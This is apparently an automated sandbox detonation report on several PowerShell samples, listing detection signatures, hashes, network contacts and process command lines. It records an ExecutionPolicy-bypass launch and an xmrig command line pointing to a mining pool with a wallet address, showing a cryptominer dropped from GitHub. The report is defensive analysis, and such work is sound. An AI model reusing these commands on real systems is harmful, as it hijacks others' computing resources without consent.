N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 67.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 91.65.42.20.in-addr.arpa udp

Files

memory/3464-0-0x00007FFC3E9F3000-0x00007FFC3E9F5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5yxkm0so.1nj.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3464-11-0x00007FFC3E9F0000-0x00007FFC3F4B1000-memory.dmp

memory/3464-10-0x0000018ACDB50000-0x0000018ACDB72000-memory.dmp

memory/3464-12-0x00007FFC3E9F0000-0x00007FFC3F4B1000-memory.dmp

memory/3464-14-0x00007FFC3E9F0000-0x00007FFC3F4B1000-memory.dmp

memory/3464-16-0x0000018AB5410000-0x0000018AB541A000-memory.dmp

memory/3464-15-0x0000018ACDBC0000-0x0000018ACDBD2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/940-47-0x00000207C51E0000-0x00000207C5200000-memory.dmp

memory/940-48-0x0000020858F50000-0x0000020858F70000-memory.dmp

memory/940-49-0x00007FF64A930000-0x00007FF64B563000-memory.dmp

memory/940-52-0x00000208595C0000-0x00000208595E0000-memory.dmp

memory/940-51-0x0000020859390000-0x00000208593B0000-memory.dmp

memory/940-50-0x00007FF64A930000-0x00007FF64B563000-memory.dmp

memory/3464-53-0x00007FFC3E9F3000-0x00007FFC3E9F5000-memory.dmp

memory/3464-54-0x00007FFC3E9F0000-0x00007FFC3F4B1000-memory.dmp

memory/3464-56-0x00007FFC3E9F0000-0x00007FFC3F4B1000-memory.dmp

memory/940-55-0x00007FF64A930000-0x00007FF64B563000-memory.dmp

memory/940-57-0x00007FF64A930000-0x00007FF64B563000-memory.dmp

memory/940-58-0x0000020859390000-0x00000208593B0000-memory.dmp

memory/940-59-0x00000208595C0000-0x00000208595E0000-memory.dmp

memory/940-60-0x00007FF64A930000-0x00007FF64B563000-memory.dmp

memory/940-61-0x00007FF64A930000-0x00007FF64B563000-memory.dmp

memory/940-62-0x00007FF64A930000-0x00007FF64B563000-memory.dmp

memory/940-63-0x00007FF64A930000-0x00007FF64B563000-memory.dmp

memory/940-64-0x00007FF64A930000-0x00007FF64B563000-memory.dmp

memory/940-65-0x00007FF64A930000-0x00007FF64B563000-memory.dmp

memory/940-66-0x00007FF64A930000-0x00007FF64B563000-memory.dmp

memory/940-67-0x00007FF64A930000-0x00007FF64B563000-memory.dmp

memory/940-68-0x00007FF64A930000-0x00007FF64B563000-memory.dmp

memory/940-69-0x00007FF64A930000-0x00007FF64B563000-memory.dmp

memory/940-70-0x00007FF64A930000-0x00007FF64B563000-memory.dmp

memory/940-71-0x00007FF64A930000-0x00007FF64B563000-memory.dmp

memory/940-72-0x00007FF64A930000-0x00007FF64B563000-memory.dmp

memory/940-73-0x00007FF64A930000-0x00007FF64B563000-memory.dmp

memory/940-74-0x00007FF64A930000-0x00007FF64B563000-memory.dmp

memory/940-75-0x00007FF64A930000-0x00007FF64B563000-memory.dmp

memory/940-76-0x00007FF64A930000-0x00007FF64B563000-memory.dmp

memory/940-77-0x00007FF64A930000-0x00007FF64B563000-memory.dmp

memory/940-78-0x00007FF64A930000-0x00007FF64B563000-memory.dmp

memory/940-79-0x00007FF64A930000-0x00007FF64B563000-memory.dmp

memory/940-80-0x00007FF64A930000-0x00007FF64B563000-memory.dmp

memory/940-81-0x00007FF64A930000-0x00007FF64B563000-memory.dmp

memory/940-82-0x00007FF64A930000-0x00007FF64B563000-memory.dmp

memory/940-83-0x00007FF64A930000-0x00007FF64B563000-memory.dmp

memory/940-84-0x00007FF64A930000-0x00007FF64B563000-memory.dmp

memory/940-85-0x00007FF64A930000-0x00007FF64B563000-memory.dmp

memory/940-86-0x00007FF64A930000-0x00007FF64B563000-memory.dmp

memory/940-87-0x00007FF64A930000-0x00007FF64B563000-memory.dmp

memory/940-88-0x00007FF64A930000-0x00007FF64B563000-memory.dmp

memory/940-89-0x00007FF64A930000-0x00007FF64B563000-memory.dmp

memory/940-90-0x00007FF64A930000-0x00007FF64B563000-memory.dmp

memory/940-91-0x00007FF64A930000-0x00007FF64B563000-memory.dmp

memory/940-92-0x00007FF64A930000-0x00007FF64B563000-memory.dmp

memory/940-93-0x00007FF64A930000-0x00007FF64B563000-memory.dmp

memory/940-94-0x00007FF64A930000-0x00007FF64B563000-memory.dmp

memory/940-95-0x00007FF64A930000-0x00007FF64B563000-memory.dmp

memory/940-96-0x00007FF64A930000-0x00007FF64B563000-memory.dmp

memory/940-97-0x00007FF64A930000-0x00007FF64B563000-memory.dmp

memory/940-98-0x00007FF64A930000-0x00007FF64B563000-memory.dmp

memory/940-99-0x00007FF64A930000-0x00007FF64B563000-memory.dmp

memory/940-100-0x00007FF64A930000-0x00007FF64B563000-memory.dmp

memory/940-101-0x00007FF64A930000-0x00007FF64B563000-memory.dmp

memory/940-102-0x00007FF64A930000-0x00007FF64B563000-memory.dmp

memory/940-103-0x00007FF64A930000-0x00007FF64B563000-memory.dmp

memory/940-104-0x00007FF64A930000-0x00007FF64B563000-memory.dmp

memory/940-105-0x00007FF64A930000-0x00007FF64B563000-memory.dmp

memory/940-106-0x00007FF64A930000-0x00007FF64B563000-memory.dmp

memory/940-107-0x00007FF64A930000-0x00007FF64B563000-memory.dmp

memory/940-108-0x00007FF64A930000-0x00007FF64B563000-memory.dmp

memory/940-109-0x00007FF64A930000-0x00007FF64B563000-memory.dmp

memory/940-110-0x00007FF64A930000-0x00007FF64B563000-memory.dmp

memory/940-111-0x00007FF64A930000-0x00007FF64B563000-memory.dmp

memory/940-112-0x00007FF64A930000-0x00007FF64B563000-memory.dmp

memory/940-113-0x00007FF64A930000-0x00007FF64B563000-memory.dmp

memory/940-114-0x00007FF64A930000-0x00007FF64B563000-memory.dmp

memory/940-115-0x00007FF64A930000-0x00007FF64B563000-memory.dmp

memory/940-116-0x00007FF64A930000-0x00007FF64B563000-memory.dmp

memory/940-117-0x00007FF64A930000-0x00007FF64B563000-memory.dmp

memory/940-118-0x00007FF64A930000-0x00007FF64B563000-memory.dmp

Analysis: behavioral31

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 03:02

Platform

win10v2004-20240426-en

Max time kernel

1788s

Max time network

1784s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 138.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 20.231.121.79:80 tcp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 82.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp

Files

memory/1280-0-0x00007FF84FA83000-0x00007FF84FA85000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lzqjcikr.o41.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1280-6-0x00000231C17B0000-0x00000231C17D2000-memory.dmp

memory/1280-11-0x00007FF84FA80000-0x00007FF850541000-memory.dmp

memory/1280-12-0x00007FF84FA80000-0x00007FF850541000-memory.dmp

memory/1280-14-0x00007FF84FA80000-0x00007FF850541000-memory.dmp

memory/1280-16-0x00000231C1790000-0x00000231C179A000-memory.dmp

memory/1280-15-0x00000231C18E0000-0x00000231C18F2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4040-47-0x0000020B83B70000-0x0000020B83B90000-memory.dmp

memory/4040-48-0x0000020B83BB0000-0x0000020B83BD0000-memory.dmp

memory/4040-49-0x00007FF68C590000-0x00007FF68D1C3000-memory.dmp

memory/4040-51-0x0000020C16790000-0x0000020C167B0000-memory.dmp

memory/4040-50-0x0000020B83BD0000-0x0000020B83BF0000-memory.dmp

memory/4040-52-0x00007FF68C590000-0x00007FF68D1C3000-memory.dmp

memory/1280-53-0x00007FF84FA80000-0x00007FF850541000-memory.dmp

memory/1280-54-0x00007FF84FA83000-0x00007FF84FA85000-memory.dmp

memory/1280-56-0x00007FF84FA80000-0x00007FF850541000-memory.dmp

memory/4040-55-0x00007FF68C590000-0x00007FF68D1C3000-memory.dmp

memory/4040-59-0x0000020C16790000-0x0000020C167B0000-memory.dmp

memory/4040-58-0x0000020B83BD0000-0x0000020B83BF0000-memory.dmp

memory/4040-57-0x00007FF68C590000-0x00007FF68D1C3000-memory.dmp

memory/4040-60-0x00007FF68C590000-0x00007FF68D1C3000-memory.dmp

memory/4040-61-0x00007FF68C590000-0x00007FF68D1C3000-memory.dmp

memory/4040-62-0x00007FF68C590000-0x00007FF68D1C3000-memory.dmp

memory/4040-63-0x00007FF68C590000-0x00007FF68D1C3000-memory.dmp

memory/4040-64-0x00007FF68C590000-0x00007FF68D1C3000-memory.dmp

memory/4040-65-0x00007FF68C590000-0x00007FF68D1C3000-memory.dmp

memory/4040-66-0x00007FF68C590000-0x00007FF68D1C3000-memory.dmp

memory/4040-67-0x00007FF68C590000-0x00007FF68D1C3000-memory.dmp

memory/4040-68-0x00007FF68C590000-0x00007FF68D1C3000-memory.dmp

memory/4040-69-0x00007FF68C590000-0x00007FF68D1C3000-memory.dmp

memory/4040-70-0x00007FF68C590000-0x00007FF68D1C3000-memory.dmp

memory/4040-71-0x00007FF68C590000-0x00007FF68D1C3000-memory.dmp

memory/4040-72-0x00007FF68C590000-0x00007FF68D1C3000-memory.dmp

memory/4040-73-0x00007FF68C590000-0x00007FF68D1C3000-memory.dmp

memory/4040-74-0x00007FF68C590000-0x00007FF68D1C3000-memory.dmp

memory/4040-75-0x00007FF68C590000-0x00007FF68D1C3000-memory.dmp

memory/4040-76-0x00007FF68C590000-0x00007FF68D1C3000-memory.dmp

memory/4040-77-0x00007FF68C590000-0x00007FF68D1C3000-memory.dmp

memory/4040-78-0x00007FF68C590000-0x00007FF68D1C3000-memory.dmp

memory/4040-79-0x00007FF68C590000-0x00007FF68D1C3000-memory.dmp

memory/4040-80-0x00007FF68C590000-0x00007FF68D1C3000-memory.dmp

memory/4040-81-0x00007FF68C590000-0x00007FF68D1C3000-memory.dmp

memory/4040-82-0x00007FF68C590000-0x00007FF68D1C3000-memory.dmp

memory/4040-83-0x00007FF68C590000-0x00007FF68D1C3000-memory.dmp

memory/4040-84-0x00007FF68C590000-0x00007FF68D1C3000-memory.dmp

memory/4040-85-0x00007FF68C590000-0x00007FF68D1C3000-memory.dmp

memory/4040-86-0x00007FF68C590000-0x00007FF68D1C3000-memory.dmp

memory/4040-87-0x00007FF68C590000-0x00007FF68D1C3000-memory.dmp

memory/4040-88-0x00007FF68C590000-0x00007FF68D1C3000-memory.dmp

memory/4040-89-0x00007FF68C590000-0x00007FF68D1C3000-memory.dmp

memory/4040-90-0x00007FF68C590000-0x00007FF68D1C3000-memory.dmp

memory/4040-91-0x00007FF68C590000-0x00007FF68D1C3000-memory.dmp

memory/4040-92-0x00007FF68C590000-0x00007FF68D1C3000-memory.dmp

memory/4040-93-0x00007FF68C590000-0x00007FF68D1C3000-memory.dmp

memory/4040-94-0x00007FF68C590000-0x00007FF68D1C3000-memory.dmp

memory/4040-95-0x00007FF68C590000-0x00007FF68D1C3000-memory.dmp

memory/4040-96-0x00007FF68C590000-0x00007FF68D1C3000-memory.dmp

memory/4040-97-0x00007FF68C590000-0x00007FF68D1C3000-memory.dmp

memory/4040-98-0x00007FF68C590000-0x00007FF68D1C3000-memory.dmp

memory/4040-99-0x00007FF68C590000-0x00007FF68D1C3000-memory.dmp

memory/4040-100-0x00007FF68C590000-0x00007FF68D1C3000-memory.dmp

memory/4040-101-0x00007FF68C590000-0x00007FF68D1C3000-memory.dmp

memory/4040-102-0x00007FF68C590000-0x00007FF68D1C3000-memory.dmp

memory/4040-103-0x00007FF68C590000-0x00007FF68D1C3000-memory.dmp

memory/4040-104-0x00007FF68C590000-0x00007FF68D1C3000-memory.dmp

memory/4040-105-0x00007FF68C590000-0x00007FF68D1C3000-memory.dmp

memory/4040-106-0x00007FF68C590000-0x00007FF68D1C3000-memory.dmp

memory/4040-107-0x00007FF68C590000-0x00007FF68D1C3000-memory.dmp

memory/4040-108-0x00007FF68C590000-0x00007FF68D1C3000-memory.dmp

memory/4040-109-0x00007FF68C590000-0x00007FF68D1C3000-memory.dmp

memory/4040-110-0x00007FF68C590000-0x00007FF68D1C3000-memory.dmp

memory/4040-111-0x00007FF68C590000-0x00007FF68D1C3000-memory.dmp

memory/4040-112-0x00007FF68C590000-0x00007FF68D1C3000-memory.dmp

memory/4040-113-0x00007FF68C590000-0x00007FF68D1C3000-memory.dmp

memory/4040-114-0x00007FF68C590000-0x00007FF68D1C3000-memory.dmp

memory/4040-115-0x00007FF68C590000-0x00007FF68D1C3000-memory.dmp

memory/4040-116-0x00007FF68C590000-0x00007FF68D1C3000-memory.dmp

memory/4040-117-0x00007FF68C590000-0x00007FF68D1C3000-memory.dmp

memory/4040-118-0x00007FF68C590000-0x00007FF68D1C3000-memory.dmp

Analysis: behavioral9

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 02:31

Platform

win7-20240221-en

Max time kernel

1560s

Max time network

1561s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Network

N/A

Files

memory/2020-4-0x000007FEF628E000-0x000007FEF628F000-memory.dmp

memory/2020-6-0x0000000001E70000-0x0000000001E78000-memory.dmp

memory/2020-5-0x000000001B590000-0x000000001B872000-memory.dmp

memory/2020-7-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp

memory/2020-11-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp

memory/2020-10-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp

memory/2020-9-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp

memory/2020-8-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp

memory/2020-12-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp

Analysis: behavioral10

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 02:32

Platform

win10-20240404-en

Max time kernel

1798s

Max time network

1770s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 82.90.14.23.in-addr.arpa udp

Files

memory/2272-2-0x00007FFB3FAC3000-0x00007FFB3FAC4000-memory.dmp

memory/2272-5-0x00000177C6600000-0x00000177C6622000-memory.dmp

memory/2272-9-0x00007FFB3FAC0000-0x00007FFB404AC000-memory.dmp

memory/2272-8-0x00000177C67B0000-0x00000177C6826000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yvdhazqj.osn.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/2272-22-0x00007FFB3FAC0000-0x00007FFB404AC000-memory.dmp

memory/2272-26-0x00007FFB3FAC0000-0x00007FFB404AC000-memory.dmp

memory/2272-49-0x00000177C6790000-0x00000177C67A2000-memory.dmp

memory/2272-62-0x00000177C6770000-0x00000177C677A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2860-91-0x0000018F84750000-0x0000018F84770000-memory.dmp

memory/2860-92-0x00007FF6366C0000-0x00007FF6372F3000-memory.dmp

memory/2272-94-0x00007FFB3FAC3000-0x00007FFB3FAC4000-memory.dmp

memory/2860-93-0x00007FF6366C0000-0x00007FF6372F3000-memory.dmp

memory/2272-95-0x00007FFB3FAC0000-0x00007FFB404AC000-memory.dmp

memory/2272-96-0x00007FFB3FAC0000-0x00007FFB404AC000-memory.dmp

memory/2860-97-0x00007FF6366C0000-0x00007FF6372F3000-memory.dmp

memory/2860-98-0x00007FF6366C0000-0x00007FF6372F3000-memory.dmp

memory/2860-99-0x00007FF6366C0000-0x00007FF6372F3000-memory.dmp

memory/2860-100-0x00007FF6366C0000-0x00007FF6372F3000-memory.dmp

memory/2860-101-0x00007FF6366C0000-0x00007FF6372F3000-memory.dmp

memory/2860-102-0x00007FF6366C0000-0x00007FF6372F3000-memory.dmp

